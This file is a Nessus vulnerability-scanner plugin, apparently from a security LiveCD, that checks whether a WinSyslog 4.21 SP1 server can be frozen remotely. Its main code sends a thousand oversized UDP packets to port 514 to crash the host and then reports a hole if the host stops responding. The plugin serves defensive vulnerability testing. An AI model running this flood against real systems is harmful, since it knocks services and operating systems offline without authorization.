home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / winsyslog_dos.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  60 lines

  1. #
  2. # WinSysLog DoS
  3. # http://www.winsyslog.com
  4. #
  5.  
  6.  
  7. if(description)
  8. {
  9.     script_id(11884);
  10.     script_bugtraq_id(8821);
  11.     script_version("$Revision: 1.7 $");
  12.     name["english"] = "WinSyslog (DoS)";
  13.     script_name(english:name["english"]);
  14.  
  15.     desc["english"] = "
  16. WinSyslog is an enhanced syslog server for Windows. A vulnerability in the product allows 
  17. remote attackers to cause the WinSyslog to freeze, which in turn will also freeze the operating 
  18. system on which the product executes.
  19.     
  20. Vulnerable version: WinSyslog Version 4.21 SP1 (http://www.winsyslog.com)
  21. Solution: contact vendor http://www.winsyslog.com
  22.     
  23. Risk factor: High";
  24.  
  25.     script_description(english:desc["english"]);
  26.         summary["english"] = "Attempts to crash the remote host";
  27.     script_summary(english:summary["english"]);
  28.     script_category(ACT_DENIAL);    # ACT_FLOOD?
  29.     script_copyright(english:"This script is copyright (C) 2003 Matthew North");
  30.     family["english"] = "Denial of Service";
  31.       script_dependencies('os_fingerprint.nasl');
  32.     script_family(english:family["english"]);
  33.     exit(0);
  34. }
  35.  
  36.  
  37. include('global_settings.inc');
  38.  
  39. os = get_kb_item("Host/OS/icmp");
  40. if ( os && "Windows" >!< os ) exit(0);
  41.  
  42. if ( report_paranoia < 2 ) exit(0);
  43.  
  44.  
  45. soc = open_sock_udp(514);
  46. if(!soc) exit(0);
  47. start_denial();
  48.  
  49. for(i=0; i < 1000; i++) {
  50.                         num = (600+i)*4;
  51.             bufc = string(crap(num));
  52.                         buf = string("<00>", bufc); 
  53.                     send(socket:soc,data:buf);
  54.             }
  55.  
  56. close(soc);
  57. sleep(5);
  58. alive = end_denial();
  59. if(!alive)security_hole(port:514, proto:"udp");
  60.